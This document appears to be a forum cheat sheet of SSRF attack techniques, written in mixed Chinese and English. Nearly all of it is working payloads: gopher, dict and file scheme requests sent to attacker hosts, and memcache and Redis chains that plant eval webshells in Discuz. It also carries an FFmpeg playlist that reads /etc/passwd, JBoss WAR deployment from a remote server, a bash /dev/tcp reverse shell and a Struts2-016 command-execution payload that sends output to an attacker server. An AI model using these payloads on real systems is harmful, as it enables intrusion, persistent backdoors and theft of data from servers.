SSRF Tips

渗透小能手

SSRF PHP function

1. 
   
2. 
   
3. file_get_contents()
   
4. fsockopen()
   
5. curl_exec()
   

复制代码

URL schema support

SFTP

1. 
   
2. 
   
3. http://test.com/ssrf.php?url=s[url]ftp://evil.com:11111/[/url]
   
4. 
   
5. evil.com:$ nc -v -l 11111
   
6. Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
   
7. SSH-2.0-libssh2_1.4.2

复制代码

Dict

1. 
   
2. 
   
3. http://test.com/ssrf.php?dict://attacker:11111/
   
4. 
   
5. evil.com:$ nc -v -l 11111
   
6. Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
   
7. CLIENT libcurl 7.40.0
   
8. 
   

复制代码

gopher

1. // [url]http://test.com/ssrf.php?url=http://evil.com/gopher.php[/url]
   
2. <?php
   
3.         header('Location: [url]gopher://evil.com:12346/_HI%0AMultiline%0Atest'[/url]);
   
4. ?>
   
5. 
   
6. evil.com:# nc -v -l 12346
   
7. Listening on [0.0.0.0] (family 0, port 12346)
   
8. Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
   
9. HI
   
10. Multiline
    
11. test

复制代码

TFTP

1. http://test.com/ssrf.php?url=t[url]ftp://evil.com:12346/TESTUDPPACKET[/url]
   
2. 
   
3. evil.com:# nc -v -u -l 12346
   
4. Listening on [0.0.0.0] (family 0, port 12346)
   
5. TESTUDPPACKEToctettsize0blksize512timeout6

复制代码

file

1. http://test.com/redirect.php?url=file:///etc/passwd

复制代码

ldap

1. http://test.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

复制代码

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate serialize

1. <?php
   
2.     $code=array('global_start'=>'@eval($_REQUEST[\'eval\']);');
   
3.     echo serialize($code)."\n".strlen(serialize($code));

复制代码

Output

1. a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} //序列化数据
   
2. 59  //字符串长度

复制代码

webshell.php

1. 
   
2. <?php
   
3. //gopher可以换成如上其它方式
   
4.     header('Location: gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a');
   
5. ?>

复制代码

back.php

1. 
   
2. 
   
3. <?php
   
4.     header('Location: [url]gopher://192.168.10.12:11211/_%0d%0adelete[/url] ssrftest%0d%0a');
   
5. ?>
   
6. 
   

复制代码

example Discuz

open the website

1. http://bbs.test.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
   
2. http://bbs.test.com/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

复制代码

clear data

1. http://bbs.test.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]
   

复制代码

backdoor url

1. http://bbs.test.com/data/cache/hello.php
   

复制代码

SSRF Redis Getshell

Generate serialize

1. <?php
   
2.     $a['output']['preg']['search']['plugins'] = '/.*/e';
   
3.     $a['output']['preg']['replace']['plugins'] = '@eval($_POST['c']);';
   
4.     $a['rewritestatus']=1;
   
5.     $setting = serialize($a);
   
6.     echo $setting."\n".strlen($setting);
   
7. ?>

复制代码

Output

1. a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;}     //序列化数据
   
2. 173     //字符串长度

复制代码

example Discuz

Open website

1. http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44
   

复制代码

Backdoor website

1. http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes
   

复制代码

FFmpeg

cat test.jpg

1. 
   
2. 
   
3. #EXTM3U
   
4. #EXT-X-MEDIA-SEQUENCE:0
   
5. #EXTINF:10.0,
   
6. concat:http://example.org/header.m3u8|file:///etc/passwd
   
7. #EXT-X-ENDLIST
   

复制代码

subfile

1. 
   
2. 
   
3. #EXTM3U
   
4. #EXT-X-MEDIA-SEQUENCE:0
   
5. #EXTINF:10.0,
   
6. concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd
   
7. #EXT-X-ENDLIST

复制代码

Postgresql

Exploit

1. > SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211 sslmode=disable','select
   
2. version();');

复制代码

MongoDB

Exploit

1. 
   
2. 
   
3. > db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
   
4. > nc -l 8000 | hexdump -C
   
5. > db.copyDatabase(“\nstats\nquit”,’test’,’localhost:11211’)

复制代码

CouchDB

exploit

1. http://localhost:5984/_users/_all_docs
   

复制代码

1. 
   
2. 
   
3. HTTP/1.1 200 OK
   
4. Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
   
5. ETag: "BD1WV12007V05JTG4X6YHIHCA"
   
6. Date: Tue, 18 Dec 2012 21:39:59 GMT
   
7. Content-Type: text/plain; charset=utf-8
   
8. Cache-Control: must-revalidate
   
9. 
   
10. {"total_rows":1,"offset":0,"rows":[
    
11. {"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
    
12. ]}
    
13. 
    
14. HTTP/1.1 200 OK
    
15. Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
    
16. ETag: "BD1WV12007V05JTG4X6YHIHCA"
    
17. Date: Tue, 18 Dec 2012 21:39:59 GMT
    
18. Content-Type: text/plain; charset=utf-8
    
19. Cache-Control: must-revalidate
    
20. 
    
21. {"total_rows":1,"offset":0,"rows":[
    
22. {"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
    
23. ]}

复制代码

Attacker could also send requests from CouchDB server to intranet by using replication function

1. 
   
2. POST http://couchdb:5984/_replicate
   
3. Content-Type: application/json
   
4. Accept: application/json
   
5. 
   
6. {
   
7.     "source" : "recipes",
   
8.     "target" : "http://ssrf-me:11211/recipes",
   
9. }

复制代码

Jboss

Jbosss POC

1. /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war
   

复制代码

写入shell

1. http://target.com/ueditor/jsp/getRemoteImage.jsp
   
2. POST:
   
3.     upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F远端地址%2Fhtml5.war%23.jpg

复制代码

1. 
   
2. 
   
3. http://target.com/ueditor/jsp/getRemoteImage.jsp
   
4. POST:
   
5.     upfile=http://内网IP:8080/html5/023.jsp%23.jpg
   

复制代码

reverse shell

1. bash -i >& /dev/tcp/123.45.67.89/9999 0>&1

复制代码

Weblogic

gopher.php

1. 
   
2. <?php
   
3.    header("Location:gopher://vps-ip:2333/_test");
   
4. ?>

复制代码

vuln website

1. https://example.com/uddiexplorer/SearchPublicRegistries.jsp
   
2. POST:
   
3.     operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location

复制代码

vps

1. 
   
2. > nc -lvv 2333
   
3. 
   
4. Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted

复制代码

Local File Read

1. http://www.xxx.com/redirect.php?url=file:///etc/passwd
   
2. http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini

复制代码

Bool SSRF

Struts2-016 POC

1. 
   
2. ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
   
3. //修改SERVER为你vps地址,返回结果在access.log中查看

复制代码

SSRF Proxy

SSRF_Proxy

ssrfsocks